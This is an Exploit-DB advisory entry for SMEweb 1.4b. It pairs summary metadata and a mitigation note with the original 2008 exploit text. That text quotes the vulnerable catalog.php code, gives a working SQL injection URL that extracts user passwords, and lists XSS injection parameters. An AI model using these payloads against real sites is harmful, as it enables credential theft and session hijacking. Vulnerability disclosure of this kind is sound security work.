SMEweb 1.4b (SQL/XSS) Multiple Remote Vulnerabilities

vendor:

SMEweb

by:

CWH Underground

7.5

CVSS

HIGH

SQL Injection and XSS

89, 79

CWE

Product Name: SMEweb

Affected Version From: 1.4b

Affected Version To: 1.4b

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

SMEweb 1.4b (SQL/XSS) Multiple Remote Vulnerabilities

SMEweb 1.4b is vulnerable to SQL Injection and XSS. The SQL Injection vulnerability exists in the catalog.php file, where user-supplied input is not properly sanitized before being used in an SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code. The XSS vulnerability exists in multiple files, including catalog.php, search.php, bb.php, and order.php. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.

Mitigation:

Input validation should be used to ensure that untrusted data is not used to dynamically construct SQL queries. Additionally, input validation should be used to ensure that untrusted data is not used to dynamically construct HTML output.

Source

Exploit-DB raw data:

=======================================================
 SMEweb 1.4b (SQL/XSS) Multiple Remote Vulnerabilities
=======================================================

  ,--^----------,--------,-----,-------^--,
  | |||||||||   `--------'     |          O	.. CWH Underground Hacking Team ..
  `+---------------------------^----------|
    `\_,-------, _________________________|
      / XXXXXX /`|     /
     / XXXXXX /  `\   /
    / XXXXXX /\______(
   / XXXXXX /           
  / XXXXXX /
 (________(             
  `------'

AUTHOR : CWH Underground
DATE   : 2 June 2008
SITE   : www.citec.us


#####################################################
 APPLICATION : SMEweb
 VERSION     : 1.4b
 VENDOR      : http://www.smethailand.com/ 
 DOWNLOAD    : http://www.geocities.com/smes_thailand/smeweb_v14b.zip
#####################################################

---SQL Injection Exploit---

##############################################
Vulnerable: catalog.php (Line:66-69)

if($idp)  
 $sql = "select * from ".$fix."catalog where idp='$idp' and category NOT IN ('L1','LA') ";
elseif($category)   	
 $sql = "select * from ".$fix."catalog where category='$category' order by idp desc limit  1";  

 $result = mysql_db_query($dbname,$sql);
###############################################

***It's Work with Magic_quote must turn off***

http://[target]/[path]/catalog.php?idp=1'union select 1,2,password,username,5,6,7,8 from smeweb_user where userid=1 ORDER BY counter/*


---Multiple Remote XSS Exploit---

[+]catalog.php
[+]search.php
[+]bb.php
[+]order.php

Example:
     
http://[target]/[path]/catalog.php?data=<XSS>
http://[target]/[path]/search.php?keyword=<XSS>
http://[target]/[path]/bb.php?page=<XSS>
http://[target]/[path]/order.php?new_s=<XSS>

##################################################################
# Greetz: ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos  #
##################################################################

# milw0rm.com [2008-06-02]